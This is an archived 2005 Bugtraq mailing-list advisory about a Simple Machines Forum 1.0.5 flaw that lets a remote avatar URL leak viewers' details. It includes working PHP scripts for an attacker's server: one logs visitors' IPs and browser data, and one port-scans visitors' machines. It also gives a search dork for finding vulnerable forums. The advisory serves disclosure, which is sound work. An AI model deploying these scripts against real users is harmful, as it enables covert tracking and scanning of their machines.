lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050831103757.20457.qmail@securityfocus.com>
Date: 31 Aug 2005 10:37:57 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: Simple Machine Forum 1-0-5 (possibly prior versions) user IP
 address / information disclosure


Simple Machine Forum 1-0-5 (possibly prior versions) user IP address /
information disclosure

software:
site: http://www.simplemachines.org/

information disclosure:  
a user can choose an sumbit an avatar url like this:

http://[evil_site]/image.php

where image.php is a file like this:

<?php
 $log="log".date("Ymd").".txt"; 
 $fp=fopen($log,'a');
 fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
 fclose($fp)
?>

When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:

08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php

so an external user can monitor in details the forum activity, user ip addresses, have informations on OS and browsers used and so on

the evil script could check for open ports/services on target machines to send
them exploit code or proxies, trojan ports, do some other stuff, just an example:

<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>

googledork: "Powered by SMF"

rgod
site: http://rgod.altervista.org
mail: retrogod@...ceposta.it


original advisory: http://rgod.altervista.org/smf105.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ